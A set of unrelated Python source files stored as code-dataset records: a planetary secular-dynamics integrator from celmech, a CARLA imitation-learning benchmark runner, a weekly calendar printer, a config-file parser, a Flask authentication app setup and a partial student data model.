self.inc_matrix)\n\n def _get_x_vector(self):\n eta = np.array([p.eta for p in self.particles[1:]])\n kappa = np.array([p.kappa for p in self.particles[1:]])\n x = (kappa - 1j * eta) * _rt2_inv\n return x\n\n def _get_y_vector(self):\n rho = np.array([p.rho for p in self.particles[1:]])\n sigma = np.array([p.sigma for p in self.particles[1:]])\n y = (sigma - 1j * rho) * _rt2_inv\n return y\n\n def _set_x_vector(self,x):\n for p,xi in zip(self.particles[1:],x):\n p.kappa = _rt2 * np.real(xi)\n p.eta = _rt2 * np.real(1j * xi)\n\n def _set_y_vector(self,y):\n for p,yi in zip(self.particles[1:],y):\n p.sigma = _rt2 * np.real(yi)\n p.rho = _rt2 * np.real(1j * yi)\n\n def apply(self):\n x = self._get_x_vector()\n y = self._get_y_vector()\n xnew = self.ecc_operator_matrix @ x\n ynew = self.inc_operator_matrix @ y\n self._set_x_vector(xnew)\n self._set_y_vector(ynew)\n \n def apply_to_state_vector(self,state_vector):\n vecs = self._state_vector_to_individual_vectors(state_vector)\n x_by_rt2 = (vecs[:,0] - 1j * vecs[:,1]) \n y_by_rt2 = (vecs[:,4] - 1j * vecs[:,5]) \n xnew_by_rt2 = self.ecc_operator_matrix @ x_by_rt2\n ynew_by_rt2 = self.inc_operator_matrix @ y_by_rt2\n vecs[:,0] = np.real(xnew_by_rt2)\n vecs[:,1] = -1 * np.imag(xnew_by_rt2)\n vecs[:,4] = np.real(ynew_by_rt2)\n vecs[:,5] = -1 * np.imag(ynew_by_rt2)\n return vecs.reshape(-1)\n \n def calculate_Hamiltonian(self,state_vector):\n vecs = self._state_vector_to_individual_vectors(state_vector)\n x = (vecs[:,0] - 1j * vecs[:,1]) * _rt2_inv\n y = (vecs[:,4] - 1j * vecs[:,5]) * _rt2_inv\n H = np.conj(x) @ self.ecc_matrix @ x + np.conj(y) @ self.inc_matrix @ y\n return np.real(H)\n\nclass SecularSystemSimulation():\n def __init__(self, state, dt = None, dtFraction = None, max_order = 4,NsubB=1, resonances_to_include={}, DFOp_kwargs = {}):\n \"\"\"\n A class for integrating the secular equations of motion governing a planetary system.\n\n The integrations are carried out using a symplectic splitting scheme. The scheme\n separates the equations of motion into an (integrable) linear component equivalent\n to the Laplace-Largange equations of motion, and a component containing all \n higher-order terms. The linear components are solved exactly while the higher-order\n terms are solved using the symplectic implicit midpoint method.\n \n Arguments\n ---------\n state : :class:`celmech.poincare.Poincare`\n The initial dynamical state of the system.\n dt : float, optional\n The timestep to use for the integration. Either dt or dtFraction must be\n specified.\n dtFraction : float, optional\n Set the timestep to a constant fraction the period of shortest-period linear \n secular eigenmode.\n max_order : int, optional\n The maximum order of disturbing function terms to include in the integration. \n By default, the equations of motion include terms up to 4th order.\n NsubB : int, optional\n The 'B' step in the splitting scheme is divided in NsubB sub-steps which each integrate for a time dt/NsubB. By default, NsubB = 1.\n resonances_to_include : dict, optional\n A dictionary containing information that sets the list of MMRs for which the \n secular contribution will be accounted for (at second order on planet masses).\n Dictionary key and value pairs are specified in the form\n \n .. code::\n\n {(iIn,iOut) : [(j_0,k_0),...(j_N,k_N)]}\n \n include the resonances :math:`j_i` : :math:`j_i-k_i` with :math:`i=0,...,N` between planets\n iIn and iOut. Note that harmonics should **NOT** be explicitly included. I.e.,\n if (2,1) appears in the list [(j_0,k_0),...(j_N,k_N)] then the term (4,2) should\n **NOT** also appear; these terms' contributions will be added automatically when \n the (2,1) term is added.\n By default, no MMRs are included.\n\n DFOp_kwargs : dict, optional\n Keyword arguments to use when initialzing the operator used to evolve the non-linear terms. \n Keywords include:\n\n - :code:`rtol`: Sets relative tolerance for root-finding \n in the implicit Runge-Kutta step. Default is machine precision.\n\n - :code:`atol`: Sets the absolute tolerance for root-finding\n in the implicit Runge-Kutta step. Default is 0 so that tolerance\n is only specified by :code:`rtol`.\n\n - :code:`max_iter`: Maximum number of iterations for root-finding. Default is 10.\n\n - :code:`rkmethod`: Runge-Kutta method to use. Available options include:\n - 'ImplicitMidpoint'\n - 'LobattoIIIB'\n - 'GL4'\n - 'GL6'\n 'GL4' and 'GL6' are `Gauss-Legendre methods `_ of order 4 and 6, respectively.\n 'ImplicitMidpoint', 'GL4', and 'GL6' are symplectic methods while 'LobattoIIIB' is a 4th order time-reversible method (but not symplectic).\n\n - :code:`rk_root_method`: Method to use for root-finding during implicit RK step. Available options are:\n - 'Newton'\n - 'fixed_point'\n 'Newton' (default) uses Newton's method whereas 'fixed_point' uses a fixed point iteration method. \n Newton's method requires computing the Jacobian of the equations of motion but has quadratic convergence.\n Returns\n -------\n simulation : :class:`celmech.secular.SecularSystemSimulation`\n \"\"\"\n assert max_order > 3, \"'max_order' must be greater than or equal to 4.\"\n if not single_true([dt,dtFraction]):\n raise AttributeError(\"Can only pass one of dt or dtFraction\")\n llsys = LaplaceLagrangeSystem.from_Poincare(state)\n first_order_resonances_to_include = {}\n for pair,res_list in resonances_to_include.items():\n first_order_js = [ j for j,k in res_list if k==1]\n first_order_resonances_to_include.update({pair:first_order_js})\n for j in first_order_js:\n llsys.add_first_order_resonance_term(*pair,j)\n Tsec_e = np.min(np.abs(2 * np.pi / llsys.eccentricity_eigenvalues()))\n Tsec_inc = np.min(np.abs(2 * np.pi / llsys.inclination_eigenvalues()[1:]))\n self.Tsec = min(Tsec_e,Tsec_inc)\n self._NsubB = NsubB\n if dt:\n self._dtA = dt\n elif dtFraction:\n self._dtA = dtFraction * self.Tsec\n else:\n raise AttributeError(\"Must specify either 'dt' or 'dtFraction'\")\n self._dtB = self._dtA / self._NsubB\n self.linearSecOp = LinearSecularEvolutionOperator(state,self._dtA,first_order_resonances = first_order_resonances_to_include)\n self.nonlinearSecOp = DFOp.fromOrderRange(\n state,\n self._dtB,\n 4,max_order,\n resonances_to_include=resonances_to_include,\n **DFOp_kwargs\n )\n self.state = state\n self._half_step_forward_e_matrix = expm(-1j * 0.5 * self.dt * self.linearSecOp.ecc_matrix)\n self._half_step_backward_e_matrix = expm(+1j * 0.5 * self.dt * self.linearSecOp.ecc_matrix)\n self._half_step_forward_inc_matrix = expm(-1j * 0.5 * self.dt * self.linearSecOp.inc_matrix)\n self._half_step_backward_inc_matrix = expm(+1j * 0.5 * self.dt * self.linearSecOp.inc_matrix)\n self.t = 0\n\n @classmethod\n def from_Simulation(cls,sim, dt = None, dtFraction = None, max_order = 4,NsubB=1,resonances_to_include={}, DFOp_kwargs = {}):\n \"\"\"\n Initialize a :class:`SecularSystemSimulation ` object\n from a rebound simulation.\n\n Arguments\n ---------\n sim : :class:`rebound.Simulation`\n REBOUND simulation to convert to :class:`SecularSystemSimulation ` \n dt : float, optional\n The timestep to use for the integration. Either dt or dtFraction must be\n specified.\n dtFraction : float, optional\n Set the timestep to a constant fraction the period of shortest-period linear \n secular eigenmode.\n max_order : int, optional\n The maximum order of disturbing function terms to include in the integration. \n By default, the equations of motion include terms up to 4th order.\n NsubB : int, optional\n The 'B' step in the splitting scheme is divided in NsubB sub-steps which each integrate for a time dt/NsubB. By default, NsubB = 1.\n resonances_to_include : dict, optional\n A dictionary containing information that sets the list of MMRs for which the \n secular contribution will be accounted for (at second order on planet masses).\n Dictionary key and value pairs are specified in the form\n \n .. code::\n\n {(iIn,iOut) : [(j_0,k_0),...(j_N,k_N)]}\n \n include the resonances :math:`j_i` : :math`j_i-k_i` with :math:`i=0,...,N` between planets\n iIn and iOut. Note that harmonics should *NOT* be explicitly included. I.e.,\n if (2,1) appears in the list [(j_0,k_0),...(j_N,k_N)] then the term (4,2) should\n *NOT* also appear; these terms' contributions will be added automatically when \n the (2,1) term is added.\n By default, no MMRs are included.\n\n DFOp_kwargs : dict, optional\n Keyword arguments to use when initialzing the operator used to evolve the non-linear terms. \n Keywords include:\n - :code:`rtol`: Sets relative tolerance for root-finding \n in the implicit Runge-Kutta step. Default is machine precision.\n\n - :code:`atol`: Sets the absolute tolerance for root-finding\n in the implicit Runge-Kutta step. Default is 0 so that tolerance\n is only specified by :code:`rtol`.\n\n - :code:`max_iter`: Maximum number of iterations for root-finding. \n Default is 10.\n\n - :code:`rkmethod`: Runge-Kutta method to use. Available options include:\n - 'ImplicitMidpoint'\n - 'LobattoIIIB'\n - 'GL4'\n - 'GL6'\n 'GL4' and 'GL6' are `Gauss-Legendre methods `_ of order 4 and 6, respectively.\n 'ImplicitMidpoint', 'GL4', and 'GL6' are symplectic methods while 'LobattoIIIB' is a 4th order time-reversible method (but not symplectic).\n\n - :code:`rk_root_method`: Method to use for root-finding during implicit RK step. Available options are:\n - 'Newton'\n - 'fixed_point'\n 'Newton' (default) uses Newton's method whereas 'fixed_point' uses a fixed point iteration method. \n Newton's method requires computing the Jacobian of the equations of motion but has quadratic convergence.\n \n Returns\n -------\n sim : :class:`SecularSystemSimulation ` \n\n \"\"\"\n pvars = Poincare.from_Simulation(sim)\n return cls(\n pvars,\n max_order = max_order,\n NsubB=NsubB,\n dt = dt,\n dtFraction = dtFraction,\n resonances_to_include=resonances_to_include,\n DFOp_kwargs = DFOp_kwargs\n )\n\n @property\n def state_vector(self):\n state_vec = []\n for p in self.state.particles[1:]:\n state_vec += [p.kappa,p.eta,p.Lambda,p.l,p.sigma,p.rho]\n return np.array(state_vec)\n @property\n def NsubB(self):\n return self._NsubB\n @NsubB.setter\n def NsubB(self,N):\n self._NsubB = N\n self._dtB = self._dtA / N\n self.nonlinearSecOp.dt = self._dtB\n @property\n def dt(self):\n return self._dtA\n @dt.setter\n def dt(self,value):\n self._dtA = value\n self._dtB = self._dtA / self._NsubB\n self.linearSecOp.dt = self._dtA\n self.nonlinearSecOp.dt = self._dtB\n self._half_step_forward_e_matrix = expm(-1j * 0.5 * value * self.linearSecOp.ecc_matrix)\n self._half_step_backward_e_matrix = expm(+1j * 0.5 * value * self.linearSecOp.ecc_matrix)\n self._half_step_forward_inc_matrix = expm(-1j * 0.5 * value * self.linearSecOp.inc_matrix)\n self._half_step_backward_inc_matrix = expm(+1j * 0.5 * value * self.linearSecOp.inc_matrix)\n\n def _linearOp_half_step_forward(self,state_vec):\n \"\"\"\n Advance state vector a half timestep forward with the \n linear secular evolution operator.\n \"\"\"\n vecs = self.linearSecOp._state_vector_to_individual_vectors(state_vec)\n x = (vecs[:,0] - 1j * vecs[:,1]) * _rt2_inv\n y = (vecs[:,4] - 1j * vecs[:,5]) * _rt2_inv\n xnew = self._half_step_forward_e_matrix @ x\n ynew = self._half_step_forward_inc_matrix @ y\n vecs[:,0] = _rt2 * np.real(xnew)\n vecs[:,1] = -1 * _rt2 * np.imag(xnew)\n vecs[:,4] = _rt2 * np.real(ynew)\n vecs[:,5] = -1 * _rt2 * np.imag(ynew)\n return vecs.reshape(-1)\n \n def _linearOp_half_step_backward(self,state_vec):\n \"\"\"\n Advance state vector a half timestep backward with the \n linear secular evolution operator.\n \"\"\"\n vecs = self.linearSecOp._state_vector_to_individual_vectors(state_vec)\n x = (vecs[:,0] - 1j * vecs[:,1]) * _rt2_inv\n y = (vecs[:,4] - 1j * vecs[:,5]) * _rt2_inv\n xnew = self._half_step_backward_e_matrix @ x\n ynew = self._half_step_backward_inc_matrix @ y\n vecs[:,0] = _rt2 * np.real(xnew)\n vecs[:,1] = -1 * _rt2 * np.imag(xnew)\n vecs[:,4] = _rt2 * np.real(ynew)\n vecs[:,5] = -1 * _rt2 * np.imag(ynew)\n return vecs.reshape(-1)\n \n def update_state_from_vector(self,state_vec):\n vecs = self.linearSecOp._state_vector_to_individual_vectors(state_vec)\n for vals,p in zip(vecs,self.state.particles[1:]):\n p.kappa,p.eta,p.Lambda,p.l,p.sigma,p.rho = vals\n\n def integrate(self,time,exact_finish_time = False, corrector=False):\n \"\"\"\n Advance simulation by integrating to specified time.\n\n Arguments\n ---------\n time : float\n Time to integrate to\n exact_finish_time : bool, optional\n **NOT CURRENTLY IMPLEMENTED**\n If :code:`True`, system will be advanced to user-specified time exactly.\n This is done by applying symplectic correctors to reach times\n in between fixed multiples of the integrator's time step.\n If :code:`False`, system will advance by a fixed number of time steps\n to the first time after the user-specified `time` argument.\n Default is :code:`False`.\n corrector: bool, optional\n If :code:`True`, symplectic correctors are applied at the beginning\n and end of integration. Default is :code:`False`.\n\n Returns\n -------\n None\n \"\"\"\n assert time >= self.t, \"Backward integration is currently not implemented.\"\n Nstep = int( np.ceil( (time-self.t) / self.dt) )\n state_vec = self.state_vector\n if corrector is True:\n state_vec = self.corrector3(state_vec, self.dt)\n state_vec = self._linearOp_half_step_forward(state_vec)\n for _ in xrange(Nstep):\n\n # B step\n state_vec = self._Bstep(state_vec)\n \n # A step\n state_vec = self.linearSecOp.apply_to_state_vector(state_vec)\n\n if exact_finish_time:\n warnings.warn(\"Exact finish time is not currently implemented.\")\n state_vec = self._linearOp_half_step_backward(state_vec)\n if corrector is True:\n state_vec = self.corrector3inv(state_vec, self.dt)\n self.update_state_from_vector(state_vec)\n self.t += Nstep * self.dt\n\n def _Bstep(self,state_vec):\n nlOp = self.nonlinearSecOp\n qp = nlOp.state_vec_to_qp_vec(state_vec)\n for _ in xrange(self.NsubB):\n qp = nlOp.rk_step(qp)\n for i in xrange(nlOp.Npl):\n # eta\n state_vec[6*i+1] = qp[i]\n # kappa\n state_vec[6*i] = qp[i + 2 * nlOp.Npl]\n # rho\n state_vec[6*i+5] = qp[i + nlOp.Npl]\n # sigma\n state_vec[6*i+4] = qp[i + 3 * nlOp.Npl]\n\n return state_vec\n def calculate_energy(self):\n \"\"\"\n Calculate the value of the system's Hamiltonian (i.e., the energy)\n\n Returns:\n energy : float\n \"\"\"\n sv = self.state_vector\n E = self.linearSecOp.calculate_Hamiltonian(sv)\n E += self.nonlinearSecOp.calculate_Hamiltonian(sv)\n return E\n\n def calculate_AMD(self):\n \"\"\"\n Calculate the value of the system's angular momentum deficit.\n \"\"\"\n return np.sum([p.Q + p.Gamma for p in self.state.particles[1:]])\n\n def X(self, state_vec, a, b, h):\n state_vec = self._apply_A_step_for_dt(state_vec,-a*h)\n state_vec = self._apply_B_step_for_dt(state_vec,b*h)\n state_vec = self._apply_A_step_for_dt(state_vec,a*h)\n return state_vec\n\n def Z(self, state_vec, a, b, h):\n state_vec = self.X(state_vec, -a, -b, h)\n state_vec = self.X(state_vec, a, b, h)\n return state_vec\n\n def corrector3(self, state_vec, h):\n alpha = (7./40.)**0.5\n beta = 1/48./alpha\n a1 = -alpha\n a2 = alpha\n b2 = beta/2.\n b1 = -beta/2.\n \n state_vec = self.Z(state_vec, a2, b2, h)\n state_vec = self.Z(state_vec, a1, b1, h)\n return state_vec\n\n def corrector3inv(self, state_vec, h):\n alpha = (7./40.)**0.5\n beta = 1/48./alpha\n a1 = -alpha\n a2 = alpha\n b2 = beta/2.\n b1 = -beta/2.\n \n state_vec = self.Z(state_vec, a1, -b1, h)\n state_vec = self.Z(state_vec, a2, -b2, h)\n return state_vec\n\n def _apply_A_step_for_dt(self,state_vec,dt):\n \"\"\"\n Apply the linear secular evolution operator for a time\n 'dt' to a state vector.\n\n Argruments:\n \n state_vec : ndarray\n State vector of planetary system.\n dt : float\n Timestep to apply operator for.\n\n Returns:\n state_vec : ndarray\n Updated state vector after application of operator.\n \"\"\"\n opMtrx_ecc = expm(-1j * dt * self.linearSecOp.ecc_matrix)\n opMtrx_inc = expm(-1j * dt * self.linearSecOp.inc_matrix)\n\n vecs = self.linearSecOp._state_vector_to_individual_vectors(state_vec)\n x = (vecs[:,0] - 1j * vecs[:,1]) * _rt2_inv\n y = (vecs[:,4] - 1j * vecs[:,5]) * _rt2_inv\n xnew = opMtrx_ecc @ x\n ynew = opMtrx_inc @ y\n vecs[:,0] = _rt2 * np.real(xnew)\n vecs[:,1] = -1 * _rt2 * np.imag(xnew)\n vecs[:,4] = _rt2 * np.real(ynew)\n vecs[:,5] = -1 * _rt2 * np.imag(ynew)\n return vecs.reshape(-1)\n\n def _apply_B_step_for_dt(self,state_vec,dt):\n \"\"\"\n Apply the secular evolution operator for the non-linear (4th and higher order)\n secular terms for a time 'dt' to a state vector.\n\n Argruments\n ----------\n state_vec : ndarray\n State vector of planetary system.\n dt : float\n Timestep to apply operator for.\n\n Returns\n -------\n state_vec : ndarray\n Updated state vector after application of operator.\n \"\"\"\n\n # change time-step\n self.nonlinearSecOp.dt = dt/self._NsubB\n\n # apply\n for _ in xrange(self.NsubB):\n state_vec = self.nonlinearSecOp.apply_to_state_vector(state_vec)\n \n # set time-step back to default\n self.nonlinearSecOp.dt = self._dtB\n \n # return result\n return state_vec\n\nclass SecularSystemRKIntegrator():\n \"\"\"\n A class for integrating the secular equations of motion governing a planetary system.\n The integrations are carried out using a user-specified Runge-Kutta method. \n\n Arguments\n ---------\n state : :class:`celmech.poincare.Poincare`\n The initial dynamical state of the system.\n dt : float, optional\n The timestep to use for the integration. Either dt or dtFraction must be\n specified.\n dtFraction : float, optional\n Set the timestep to a constant fraction the period of shortest-period linear \n secular eigenmode.\n max_order : int, optional\n The maximum order of disturbing function terms to include in the integration. \n By default, the equations of motion include terms up to 4th order.\n resonances_to_include : dict, optional\n A dictionary containing information that sets the list of MMRs for which the \n secular contribution will be accounted for (at second order on planet masses).\n Dictionary key and value pairs are specified in the form\n \n .. code::\n \n {(iIn,iOut) : [(j_0,k_0),...(j_N,k_N)]}\n \n include the resonances :math:`j_i` : :math:`j_i-k_i` with :math:`i=0,...,N` between planets\n iIn and iOut. Note that harmonics should **NOT** be explicitly included. I.e.,\n if (2,1) appears in the list [(j_0,k_0),...(j_N,k_N)] then the term (4,2) should\n **NOT** also appear; these terms' contributions will be added automatically when \n the (2,1) term is added.\n By default, no MMRs are included.\n \n DFOp_kwargs : dict, optional\n Keyword arguments specifying options for the Runge-Kutta integrator.\n Arguments include:\n - :code:`rtol`: Sets relative tolerance for root-finding \n in the implicit Runge-Kutta step. Default is machine precision.\n \n - :code:`atol`: Sets the absolute tolerance for root-finding\n in the implicit Runge-Kutta step. Default is 0 so that tolerance\n is only specified by :code:`rtol`.\n \n - :code:`max_iter`: Maximum number of iterations for root-finding. Default is 10.\n \n - :code:`rkmethod`: Runge-Kutta method to use. Available options include:\n - 'ImplicitMidpoint'\n - 'LobattoIIIB'\n - 'GL4'\n - 'GL6'\n 'GL4' and 'GL6' are `Gauss-Legendre methods `_ of order 4 and 6, respectively.\n 'ImplicitMidpoint', 'GL4', and 'GL6' are symplectic methods while 'LobattoIIIB' is a 4th order time-reversible method (but not symplectic).\n \n - :code:`rk_root_method`: Method to use for root-finding during implicit RK step. Available options are:\n - 'Newton'\n - 'fixed_point'\n 'Newton' (default) uses Newton's method whereas 'fixed_point' uses a fixed point iteration method. \n Newton's method requires computing the Jacobian of the equations of motion but has quadratic convergence.\n \"\"\"\n def __init__(self, state, dt = None, dtFraction = None, max_order = 4,NsubB=1, resonances_to_include={}, DFOp_kwargs = {}):\n assert max_order > 1, \"'max_order' must be greater than or equal to 2.\"\n if not single_true([dt,dtFraction]):\n raise AttributeError(\"Can only pass one of dt or dtFraction\")\n llsys = LaplaceLagrangeSystem.from_Poincare(state)\n first_order_resonances_to_include = {}\n for pair,res_list in resonances_to_include.items():\n first_order_js = [ j for j,k in res_list if k==1]\n first_order_resonances_to_include.update({pair:first_order_js})\n for j in first_order_js:\n llsys.add_first_order_resonance_term(*pair,j)\n Tsec_e = np.min(np.abs(2 * np.pi / llsys.eccentricity_eigenvalues()))\n Tsec_inc = np.min(np.abs(2 * np.pi / llsys.inclination_eigenvalues()[1:]))\n self.Tsec = min(Tsec_e,Tsec_inc)\n\n if dt:\n self._dt = dt\n elif dtFraction:\n self._dt = dtFraction * self.Tsec\n else:\n raise AttributeError(\"Must specify either 'dt' or 'dtFraction'\")\n self.nonlinearSecOp = DFOp.fromOrderRange(\n state,\n self._dt,\n 2,max_order,\n resonances_to_include=resonances_to_include,\n **DFOp_kwargs\n )\n self.state = state\n self.t = 0\n\n @classmethod\n def from_Simulation(cls,sim, dt = None, dtFraction = None, max_order = 4,NsubB=1,resonances_to_include={}, DFOp_kwargs = {}):\n pvars = Poincare.from_Simulation(sim)\n return cls(\n pvars,\n max_order = max_order,\n dt = dt,\n dtFraction = dtFraction,\n resonances_to_include=resonances_to_include,\n DFOp_kwargs = DFOp_kwargs\n )\n\n @property\n def state_vector(self):\n state_vec = []\n for p in self.state.particles[1:]:\n state_vec += [p.kappa,p.eta,p.Lambda,p.l,p.sigma,p.rho]\n return np.array(state_vec)\n @property\n def dt(self):\n return self._dt\n @dt.setter\n def dt(self,value):\n self._dt = value\n self.nonlinearSecOp.dt = self._dt\n\n def update_state_from_vector(self,state_vec):\n vecs = np.reshape(state_vec,(-1,6))\n for vals,p in zip(vecs,self.state.particles[1:]):\n p.kappa,p.eta,p.Lambda,p.l,p.sigma,p.rho = vals\n\n def integrate(self,time,exact_finish_time = False):\n \"\"\"\n Advance simulation by integrating to specified time.\n\n Arguments\n ---------\n time : float\n Time to integrate to\n exact_finish_time : bool, optional\n **NOT CURRENTLY IMPLEMENTED**\n If :code:`True`, system will be advanced to user-specified time exactly.\n If :code:`False`, system will advance by a fixed number of time steps\n to the first time after the user-specified `time` argument.\n Default is :code:`False`.\n\n Returns\n -------\n None\n \"\"\"\n assert time >= self.t, \"Backward integration is currently not implemented.\"\n Nstep = int( np.ceil( (time-self.t) / self.dt) )\n state_vec = self.state_vector\n nlOp = self.nonlinearSecOp\n qp = nlOp.state_vec_to_qp_vec(state_vec)\n for _ in xrange(Nstep):\n qp = nlOp.rk_step(qp)\n\n if exact_finish_time:\n warnings.warn(\"Exact finish time is not currently implemented.\")\n for i in xrange(nlOp.Npl):\n # eta\n state_vec[6*i+1] = qp[i]\n # kappa\n state_vec[6*i] = qp[i + 2 * nlOp.Npl]\n # rho\n state_vec[6*i+5] = qp[i + nlOp.Npl]\n # sigma\n state_vec[6*i+4] = qp[i + 3 * nlOp.Npl]\n\n self.update_state_from_vector(state_vec)\n self.t += Nstep * self.dt\n def calculate_energy(self):\n sv = self.state_vector\n E = self.nonlinearSecOp.calculate_Hamiltonian(sv)\n return E\n def calculate_AMD(self):\n return np.sum([p.Q + p.Gamma for p in self.state.particles[1:]])\n\n","sub_path":"celmech/secular.py","file_name":"secular.py","file_ext":"py","file_size_in_byte":44461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"387523370","text":"import argparse\nimport logging\n\nfrom carla.driving_benchmark import run_driving_benchmark\nfrom carla.driving_benchmark.experiment_suites import CoRL2017, BasicExperimentSuite\nfrom carla.driving_benchmark.experiment_suites import DAC2018\n\nfrom agents.imitation.imitation_learning import ImitationLearning\n\ntry:\n from carla import carla_server_pb2 as carla_protocol\nexcept ImportError:\n raise RuntimeError(\n 'cannot import \"carla_server_pb2.py\", run the protobuf compiler to generate this file')\n\nif (__name__ == '__main__'):\n argparser = argparse.ArgumentParser(description=__doc__)\n argparser.add_argument(\n '-v', '--verbose',\n action='store_true',\n dest='debug',\n help='print debug information')\n argparser.add_argument(\n '--host',\n metavar='H',\n default='localhost',\n help='IP of the host server (default: localhost)')\n argparser.add_argument(\n '-p', '--port',\n metavar='P',\n default=2000,\n type=int,\n help='TCP port to listen to (default: 2000)')\n argparser.add_argument(\n '-c', '--city-name',\n metavar='C',\n default='Town01',\n help='The town that is going to be used on benchmark'\n + '(needs to match active town in server, options: Town01 or Town02)')\n argparser.add_argument(\n '-n', '--log_name',\n metavar='T',\n default='test',\n help='The name of the log file to be created by the scripts'\n )\n argparser.add_argument(\n '--avoid-stopping',\n default=True,\n action='store_false',\n help=' Uses the speed prediction branch to avoid unwanted agent stops'\n )\n argparser.add_argument(\n '--dac-2018',\n action='store_true',\n help='If you want to benchmark the dac-2018 instead of the Basic one'\n )\n argparser.add_argument(\n '--continue-experiment',\n action='store_true',\n help='If you want to continue the experiment with the given log name'\n )\n argparser.add_argument(\n '-f', '--folder-name',\n metavar='F',\n default='double-lines-width_go-straight',\n help='folder in which current experiment data would be stored'\n )\n argparser.add_argument(\n '-t', '--task',\n metavar='T',\n default='go-straight',\n help='task to perform: go-straight, turn-left, turn-right'\n )\n argparser.add_argument(\n '-i', '--iterations',\n metavar='I',\n default=349,\n type=int,\n help='total number of iterations'\n )\n argparser.add_argument(\n '-w', '--weather',\n metavar='W',\n default=1,\n type=int,\n help='Use weathers, 1- ClearNoon, 6 - HeavyRainNoon, 8 - ClearSunset'\n )\n argparser.add_argument(\n \t'-s', '--sample',\n \ttype=int,\n \tdefault=0\n )\n\n args = argparser.parse_args()\n #print(args.sample)\n #print(type(args.sample))\n #g=input()\n\n log_level = logging.DEBUG if args.debug else logging.INFO\n logging.basicConfig(format='%(levelname)s: %(message)s', level=log_level)\n\n logging.info('listening to server %s:%s', args.host, args.port)\n\n agent = ImitationLearning(args.city_name, args.avoid_stopping, args.folder_name, opt = args.sample)\n\n # We instantiate an experiment suite. Basically a set of experiments\n # that are going to be evaluated on this benchmark.\n experiment_suite = DAC2018(args.city_name, args.task, args.weather, args.iterations)\n\n # Now actually run the driving_benchmark\n run_driving_benchmark(agent, experiment_suite, args.city_name,\n args.log_name, args.continue_experiment,\n args.host, args.port)\n","sub_path":"calibration/imitation_homographyMat/run_CIL.py","file_name":"run_CIL.py","file_ext":"py","file_size_in_byte":3722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"316661741","text":"import datetime\nimport calendar\n\nstart = datetime.date(2016, 8, 1)\nweekday = calendar.weekday(start.year, start.month, start.day)\n\nd = datetime.timedelta(days=1)\n\nfor week in range(52):\n week_no = week + 1\n print('Week %2d: ' %(week_no))\n print( 'MON' + '\\t' * 2 + 'TUE' + '\\t' * 2 + 'WED' + '\\t' * 2 + \\\n \t\t'THU' + '\\t' * 2 + 'FRI' + '\\t' * 2 + 'SAT' + '\\t' * 2 + 'SUN')\n for i in range(7):\n print(start, end='\\t')\n start += d\n if i == 6:\n print('\\n')","sub_path":"week calculation.py","file_name":"week calculation.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"65710633","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom os import path\n\n\nclass Utils:\n game_config_data = None\n graph_config_data = None\n image_folder = path.join(\"..\", \"Images\")\n btn_1_img = 'button1.jpg'\n btn_2_img = 'button2.jpg'\n btn_3_img = 'button3.jpg'\n btn_4_img = 'button4.jpg'\n\n\n @staticmethod\n def read_game_config_file(config_path):\n my_config = Utils.read_file(config_path)\n Utils.game_config_data = my_config\n Utils.image_folder = Utils.game_config_data['Default']['image_folder']\n return my_config\n\n @staticmethod\n def read_graph_config_file(config_path):\n my_config = Utils.read_file(config_path)\n Utils.graph_config_data = my_config\n return my_config\n\n @staticmethod\n def read_file(config_path):\n config_dict = {}\n with open(config_path, 'r') as f:\n for line in f:\n new_line = Utils.parse_line(line)\n key = new_line.keys()\n if not key[0] in config_dict:\n config_dict[key[0]] = {}\n inner_key = new_line[key[0]].keys()\n config_dict[key[0]][inner_key[0]] = new_line[key[0]][inner_key[0]].rstrip()\n return config_dict\n\n @staticmethod\n def parse_line(line):\n point_index = line.find(\".\")\n equal_index = line.find(\"=\")\n new_dict = {}\n new_dict[line[:point_index]] = {}\n new_dict[line[:point_index]][line[point_index+1:equal_index]] = line[equal_index+1:]\n return new_dict\n\n @staticmethod\n def max_nodes_per_size(size):\n max_nodes = 0\n return max_nodes\n\n @staticmethod\n def get_enum_items(enum_object):\n list = enum_object.__dict__.keys()\n list.remove(\"__doc__\")\n list.remove(\"__module__\")\n return list\n\n @staticmethod\n def format_log_msg(msg, **kwargs):\n new_message = msg\n for key, value in kwargs.iteritems():\n new_message = \"{0}, {1}={2}\".format(new_message, key, value)\n return new_message\n","sub_path":"SupplementaryFiles/Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"416593496","text":"from flask import Flask\nfrom flask_cors import CORS\nfrom flask_limiter import Limiter\nfrom flask_limiter.util import get_remote_address\nfrom werkzeug.middleware.proxy_fix import ProxyFix\n\nfrom models import db\nfrom models.admin import Admin\nfrom routes import users, auth, admin\n\n\ndef create_app():\n app = Flask(__name__)\n\n if app.env == 'development':\n app.config.from_object('config.DevelopConfig')\n else:\n app.config.from_object('config.BaseConfig')\n\n # init ORM\n with app.app_context():\n db.init_app(app)\n db.create_all()\n\n # check if admin entry already exists and if not, add it\n if not Admin.query.filter_by(created=True).first():\n admin_instance = Admin()\n db.session.add(admin_instance)\n db.session.commit()\n\n Limiter(app, default_limits=app.config.get('REQUEST_LIMITS'), key_func=get_remote_address)\n\n app.wsgi_app = ProxyFix(app.wsgi_app, x_for=app.config.get('NUM_PROXIES'))\n\n app.register_blueprint(auth.blueprint)\n app.register_blueprint(users.blueprint)\n app.register_blueprint(admin.blueprint)\n\n CORS(app)\n\n return app\n\n\nif __name__ == '__main__':\n so_auth = create_app()\n so_auth.run()\nelse:\n gunicorn_app = create_app()\n\n\n","sub_path":"so-auth/api/api/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"631650556","text":"class StudentModel:\n \"\"\"\n 学生数据模型\n 对具体学生信息进行抽象\n \"\"\"\n\n def __init__(self, name=\"\", age=0, score=0, sid=0):\n self.name = name\n self.age = age\n self.score = score\n # 学生编号:对数据进行唯一标识(全球唯一标识符)\n self.sid = sid # 自增长1001 1002 1003\n\n # 对某个数据进行有效性验证\n @property\n def score(self):\n return self.__score\n\n @score.setter\n def score(self, value):\n if value < 0:\n value = 0\n elif value > 100:\n value = 100\n 